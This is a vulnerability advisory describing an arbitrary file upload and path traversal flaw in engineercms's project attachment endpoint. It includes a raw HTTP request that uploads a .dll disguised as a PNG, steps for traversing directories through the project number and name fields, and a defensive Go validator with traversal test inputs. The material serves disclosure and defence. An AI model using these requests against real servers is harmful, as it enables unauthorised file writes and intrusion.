Description
Summary
Version 20250429 of engineercms has a file upload vulnerability: through the project editing function, a file with any extension can be uploaded to the server, and the upload path can be made to traverse outside the intended upload directory.
Vulnerability path:
/project/product/addattachment
Details
POST /project/product/addattachment HTTP/1.1
Host: 10.4.9.55:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Length: 1133
Origin: http://10.4.9.55:8082
Connection: keep-alive
Referer: http://10.4.9.55:8082/project/25012
Cookie: hotqinsessionid=9467b51b76779ca0e37da0d21b491a39
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="pid"
25012
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="prodlabel"
111
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="prodprincipal"
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="id"
WU_FILE_0
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="name"
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="type"
image/png
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="lastModifiedDate"
2025/6/24 16:01:26
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="size"
27440
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="file"; filename="test.dll"
Content-Type: image/png
11
------geckoformboundary9fd62ad7c145696b62136695ff9e3321--
Create a new project and set the values of the number and name fields so that the resulting path traverses directories.

Enter the project and upload files:

The request is as follows:

At this point the file has been written outside the upload directory, into the "Documents" directory.
Code
The processing function corresponding to the upload request path "/project/product/addattachment" is as follows:

The variable that holds the final uploaded file path is filepath:

The filepath variable is built as follows:

The value of the DiskDirectory variable is concatenated directly with the project number and name, without sanitizing either of them, so a number or name containing traversal sequences escapes the upload directory.
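As an added, defender-side example (this is not engineercms's own code): a Go helper that builds the attachment path from the same inputs the page names (the DiskDirectory root, the project number, the project name and the uploaded filename), rejects any component that would leave the upload root, strips client-supplied directories from the filename, and enforces an extension allowlist so that a file such as test.dll is refused. The function names, the allowlist and the sample root directory are assumptions, not values from the project.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// allowedExt is a hypothetical allowlist; the real policy is not shown on the page.
var allowedExt = map[string]bool{
	".png": true, ".jpg": true, ".jpeg": true, ".pdf": true, ".docx": true,
}

var errBadComponent = errors.New("path component rejected")

// cleanComponent accepts a single directory or file name and rejects anything
// that could change the directory level: separators, ".", ".." and NUL bytes.
func cleanComponent(s string) (string, error) {
	s = strings.TrimSpace(s)
	if s == "" || s == "." || s == ".." {
		return "", errBadComponent
	}
	if strings.ContainsAny(s, "/\\\x00") {
		return "", errBadComponent
	}
	return s, nil
}

// SafeAttachmentPath joins root/projectNumber/projectName/filename and returns
// an error if the result would not stay inside root or the extension is not allowed.
func SafeAttachmentPath(root, projectNumber, projectName, filename string) (string, error) {
	num, err := cleanComponent(projectNumber)
	if err != nil {
		return "", fmt.Errorf("project number: %w", err)
	}
	name, err := cleanComponent(projectName)
	if err != nil {
		return "", fmt.Errorf("project name: %w", err)
	}
	// filepath.Base discards any directory part the client sent in the filename.
	base, err := cleanComponent(filepath.Base(filename))
	if err != nil {
		return "", fmt.Errorf("filename: %w", err)
	}
	ext := strings.ToLower(filepath.Ext(base))
	if !allowedExt[ext] {
		return "", fmt.Errorf("extension %q not allowed", ext)
	}
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	full := filepath.Join(absRoot, num, name, base)
	// Defense in depth: even after component checks, confirm the cleaned path is under root.
	rel, err := filepath.Rel(absRoot, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errBadComponent
	}
	return full, nil
}

func main() {
	root := "/srv/engineercms/attachment" // constructed sample root, not the project's default
	cases := [][3]string{
		{"25012", "demo", "plan.pdf"},          // normal upload
		{"../../Documents", "demo", "a.png"},   // traversal via project number (rejected)
		{"25012", "demo", "test.dll"},          // disallowed extension (rejected)
		{"25012", "demo", "../../etc/x.png"},   // directory part in filename is stripped
	}
	for _, c := range cases {
		p, err := SafeAttachmentPath(root, c[0], c[1], c[2])
		fmt.Printf("%-40v -> path=%q err=%v\n", c, p, err)
	}
}
```

The two checks are deliberately redundant: per-component validation gives a precise error message, and the final filepath.Rel check catches anything the component rules missed (for example a future change that adds a new user-controlled segment).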

